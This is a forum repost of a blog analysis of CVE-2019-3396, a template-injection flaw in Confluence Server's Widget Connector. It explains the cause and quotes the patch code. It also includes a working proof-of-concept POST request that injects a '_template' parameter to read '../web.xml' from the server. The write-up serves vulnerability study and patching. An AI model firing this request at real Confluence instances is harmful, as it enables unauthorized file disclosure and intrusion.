Nytro Posted April 7, 2019 Report Share Posted April 7, 2019 【CVE-2019-3396】:SSTI and RCE in Confluence Server via Widget Connector 发表于 2019-04-06 | 分类于 Web Security | 阅读次数 1141 Twitter: chybeta Security Advisory https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html Analysis According to the document , there are three parameters that you can set to control the content or format of the macro output, including URL、Width and Height. the Widget Connector has defind some renders. for example the FriendFeedRenderer: public class FriendFeedRenderer implements WidgetRenderer { ... public String getEmbeddedHtml(String url, Map<String, String> params) { params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm"); return this.velocityRenderService.render(getEmbedUrl(url), params); } } In FriendFeedRenderer‘s getEmbeddedHtml function , you will see they put another option _template into params map. However, some other renderers, such as in video category , just call render(getEmbedUrl(url), params) directly So in this situation, we can "offer" the _template ourseleves which the backend will use the params to render Reproduce POST /rest/tinymce/1/macro/preview HTTP/1.1 {"contentId":"65601","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"../web.xml"},"body":""}} Patch in fix version, it will call doSanitizeParameters before render html which will remove the _template in parameters. The code may like this: public class WidgetMacro extends BaseMacro implements Macro, EditorImagePlaceholder { public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory) { ... this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" })); } ... public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) { ... doSanitizeParameters(parameters); return this.renderManager.getEmbeddedHtml(url, parameters); } private void doSanitizeParameters(Map<String, String> parameters) { Objects.requireNonNull(parameters); for (String sanitizedParameter : this.sanitizeFields) { parameters.remove(sanitizedParameter); } } } 点击赞赏二维码,您的支持将鼓励我继续创作! Sursa: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/ Quote Link to comment Share on other sites More sharing options...